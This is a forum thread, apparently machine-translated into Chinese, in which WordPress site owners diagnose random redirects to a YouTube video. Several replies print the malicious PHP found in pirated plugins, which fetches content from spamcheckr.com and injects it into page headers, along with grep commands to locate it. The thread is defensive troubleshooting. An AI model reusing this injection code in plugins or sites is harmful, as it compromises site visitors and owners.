WordPress博客感染HTML刷新元标记
大家好,我的社区。我今天有一个非常有趣的(依我看)传染病要和大家分享 4-5天前,我意识到我的博客主页在加载几秒钟后被重定向到另一个页面。特别是在youtube上观看贾斯汀·比伯的视频。我认为这是我电脑的问题,所以我扫描了病毒和恶意软件。但这不是我的错 最后,我确信这不是本地问题,因为谷歌pagespeed insights也有同样的结果 所以,经过几个小时的研究(还有一些坏键盘),我发现了这些线索。详情如下: 在我的标题中创建了一个元标记,如下所示:WordPress博客感染HTML刷新元标记,wordpress,redirect,virus,Wordpress,Redirect,Virus,大家好,我的社区。我今天有一个非常有趣的(依我看)传染病要和大家分享 4-5天前,我意识到我的博客主页在加载几秒钟后被重定向到另一个页面。特别是在youtube上观看贾斯汀·比伯的视频。我认为这是我电脑的问题,所以我扫描了病毒和恶意软件。但这不是我的错 最后,我确信这不是本地问题,因为谷歌pagespeed insights也有同样的结果 所以,经过几个小时的研究(还有一些坏键盘),我发现了这些线索。详情如下: 在我的标题中创建了一个元标记,如下所示: <meta http-equiv="
<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">
首先,我禁用了所有插件,但没有结果。过了一会儿,问题仍然存在。
其次,我搜索了我所有的数据库表,以确定视频的URL是否包含在某个地方,但它没有。
然后我在我的模板编辑器中一个接一个地搜索php文件,但什么都没有。
.htaccess也很清楚(不是100%确定我在那里寻找什么,但我认为没有可疑之处)
在所有这些之后,我通过FTP下载了我的整个网站,并在每个文件中搜索这个URL。我发现它包含在缓存文件夹的一些HTML文件中。我使用W3总缓存来实现这个目的。我删除了整个缓存文件夹,但过了一会儿问题仍然存在
有趣的是,这种“病毒”并不总是活跃的。它随机出现,每次出现在不同的页面上。也是在今晚,我意识到它出现在第二台计算机上,同时我的计算机上的一切看起来都很好
Youtube视频URL是:http://www.Youtube.com/watch?v=RFngSCaY5nA
所以我的问题是:在删除整个安装并从头开始之前,你们有没有人可以推荐一个解决方案?过去有没有其他人和我有同样的问题
我想这就是我要分享的一切。很抱歉,我的帖子太长了,尽量详细。我不擅长编码,这是我第一次尝试运行WordPress站点,所以,可能有些东西我忘记了
提前谢谢。我也有同样的问题,我想我找到了解决办法! 检查站点文件以获取此链接: 我在formcraft插件中找到了这个链接 像这样:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
编辑:
同时检查以下内容:以上回答很好。此外,我建议搜索代码有困难的人使用grep:
grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content
如果您没有grep且无法访问服务器(windows用户),请下载或使用findstr:
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
(别忘了将/www/wordpress/wp内容更改到您的位置或您的wordpress文件夹中我在wordpress fooboxV2插件中找到了此脚本。(FooBox) 插件官方网址是 这是脚本文件路径 /wp content/plugins/fooboxV2/includes/dullic_class.php 你可以看到整个脚本都被注释了。但是我在注释的代码中找到了这段代码
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>
如果您使用的是Gravity表单的空版本,您可能也会遇到此重定向问题。要解决此问题,请转到/plugins/gravityforms/settings/setting.php并删除以下代码:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>
祝你好运。也找到了它。在我的例子中,我使用了一个明显为空的插件(我没有意识到)。它名为woocommerce checkout field editor,正在注入一个指向Justin Bieber youtube视频的链接 该函数如下所示,隐藏在\wp content\plugins\woocommerce checkout field editor\assets\js\class.php中:
if (mt_rand(0,99) == 1) {
function sec_check() {
if(function_exists('curl_init'))
{
$url = "spamcheckr.com/req.php";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head','sec_check');
}
正如我们所看到的,它只在随机函数点击“1”时显示垃圾邮件。然后,它礼貌地询问是否安装了curl,然后向垃圾邮件服务器发送一个简单的GET请求,以查看应该注入什么代码
该网站是spamcheckr.com
然后,它将自己添加到WordPress标题中,并重定向页面的查看器
我向他们的主机报告了该站点,让我们看看会发生什么。是的!我在同一个插件中发现了相同的代码。。我们必须小心更改插件的下载源。。我已经检查了我的站点好几次,甚至从远程桌面上检查过,一切似乎都正常。我会再检查几次,然后你会得到绿色的复选标记!谢谢你的回复!我删除了代码,也清除了缓存,但过了一会儿它又重新定向了。天哪,看起来它被击中了!我是FooBox的开发人员,文件/wp content/plugins/fooboxV2/includes/dullic_class.php不是官方FooBox插件的一部分。因此,您运行的FooBox版本似乎不是t他是fooplugins.com的官方插件,但实际上是一个修改版,有人在其中添加了一些垃圾邮件注入器代码。是的,我对此表示怀疑。因为我从非官方网站下载了这个插件,所有插件都是一样的,都注入了这个代码。实际上我认为它是由所有者添加的。感谢你告诉我这一点。我想你最好能提高这个插件的安全性,以防黑客攻击。再次感谢。